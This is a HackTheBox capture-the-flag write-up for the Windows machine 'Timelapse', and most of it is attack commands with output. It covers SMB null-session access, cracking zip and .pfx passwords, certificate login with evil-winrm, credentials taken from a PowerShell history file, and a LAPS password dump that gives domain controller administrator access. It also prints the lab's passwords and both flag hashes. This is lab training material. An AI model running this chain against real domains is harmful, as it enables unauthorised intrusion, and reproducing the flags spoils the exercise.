Metadata
- Platform: HackTheBox
- CTF: Timelapse
- OS: Windows
- Difficulty: Easy
Summary
An open smb share enables us to get our hands on a password-protected zip file. Once we crack it, we get access to a password-protected .pfx
file, which is also crackable. By extracting the contained certificate and its corresponding authentication keys, we get a foothold on the target.
In the PowerShell of this compromised user, we can find credentials of another account. Upon further inspection, this account may access the local administrative password of the domain controller. After requesting it from the target, we compromise it entirety.
Solution
Reconnaissance
Nmap reveals that we are dealing with an AD environment.
nmap -sC -sV 10.10.11.152 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 18:59 CET
Nmap scan report for 10.10.11.152
Host is up (0.058s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-18 20:04:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-03-18T20:05:38+00:00; +2h04m27s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-18T20:04:54
|_ start_date: N/A
|_clock-skew: mean: 2h04m24s, deviation: 3s, median: 2h04m21s
There is one unusual thing about this target: the WinRM service on port 5985 is not available, however the one over SSL on port 5986 is. We should remember this, in case we want to utilize Evil-WinRM.
Upon inspection of the open smb share with SMBclient, which we are allowed to access in a NULL session, we find multiple files, In the Dev
share specifically, there is a winrm_backup.zip
file.
smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
smb: \Dev\> ls
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 17:48:42 2021
.. D 0 Mon Oct 25 17:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 16:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 16:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 16:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 16:57:44 202
User Flag
After downloading this file and trying to extract it, we notice that we require a password. Since we are in no possession of a password, we can use the zip2john
utility from John The Ripper to get a hash for this file, which we can then crack with either John The Ripper or Hashcat.
hashcat hash --user -m 17220 /usr/share/wordlists/rockyou.txt
<cut>
$pkzip$1*1*2*0<cut>6452f76*$/pkzip$:supremelegacy
<cut>
Once we unzip the file using the supremelegacy
as the password, we get a new file legacyy_dev_auth.pfx
, a certificate file, which can be used for authentication. To get a shell using this cert, we need to extract the key, as well as the certificate. There are instructions out there, which clearly describe how this can be accomplished. However, as soon as we try to follow them, we get an error.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
Enter Import Password:
Mac verify error: invalid password?
This file is also password protected. To be able to crack it, we can use pfx2john
from the John The Ripper suite. Since Hashcat does not support cracking of .pfx
files, we need to use John The Ripper.
john legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:41 DONE (2025-03-18 19:52) 0.02398g/s 77481p/s 77481c/s 77481C/s thugways..thugers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we can extract the cert and key from the file, using thuglegacy
as the password. Let follow the instructions on this page to extract the relevant information from this file.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:
openssl rsa -in private.pem -out private2.pem
Enter pass phrase for private.pem:
writing RSA key
At this point we can assume that the user, for which this cert works, to be legacyy
. Since this guess is only based on the file name, and we have guest
based access to smb, we can enumerate the domain’s users and confirm that legacyy
exists.
netexec smb 10.10.11.152 --users -p "" -u "guest" --rid-brute
<cut>
SMB 10.10.11.152 445 DC01 1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB 10.10.11.152 445 DC01 1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB 10.10.11.152 445 DC01 1603: TIMELAPSE\legacyy (SidTypeUser)
SMB 10.10.11.152 445 DC01 1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB 10.10.11.152 445 DC01 1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB 10.10.11.152 445 DC01 1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3101: TIMELAPSE\Development (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3102: TIMELAPSE\HelpDesk (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3103: TIMELAPSE\svc_deploy (SidTypeUser)
Finally, we can use the cert and key to log into the system via Evil-WinRM. Remember to use the -S
flag to connect to port 5986, since 5985 is not available.
evil-winrm -i 10.10.11.152 -u timelapse.htb/legacyy -k private2.pem -c cert.crt -S
Once we are in, it is possible to claim the user flag.
7874431c5394e74e8e12566c25941e37
Root Flag
Usually, I would now start using our credentials to gather information about the domain. But since we don’t have the required password for this account, we can not simply query the entire domain. We would first need to acquire credentials elsewhere. A straight forward place to start is the PowerShell, in case this was not deleted previously.
(Get-PSReadlineOption).HistorySavePath
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txt
While the file mentioned in the command output does not exist, there is another file in this folder.
cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
It looks like the user legacyy
once created the account svc_deploy
, of which we now have the credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
. Before we enumerate this domain in its entirety, we should check the local access of this account.
net users svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
svc_deploy
is a member of the global group LAPS_Readers
. This membership allows this account to read the local Administrator
password for this machine, the domain controller, meaning we can extract it. According to this web page, this can be done in several ways. In order to not introduce another very specific tool, Netexec will get the job done and dump all respective passwords.
nxc ldap "10.10.11.152" -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV' --module laps
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer:DC01$ User: Password:3%+q700%/2C%+1/(cHF3#t$#
With the password 3%+q700%/2C%+1/(cHF3#t$#
, we can now use Evil-WinRM to get a shell as the local Administrator
on the target domain controller. Again, do not forget the -S
flag. Afterwards, we can claim the flag on the desktop folder of the TRX
user.
evil-winrm -i 10.10.11.152 -u Administrator -p '3%+q700%/2C%+1/(cHF3#t$#' -S
449dbb9b1b26c6f10e77dbd16902d674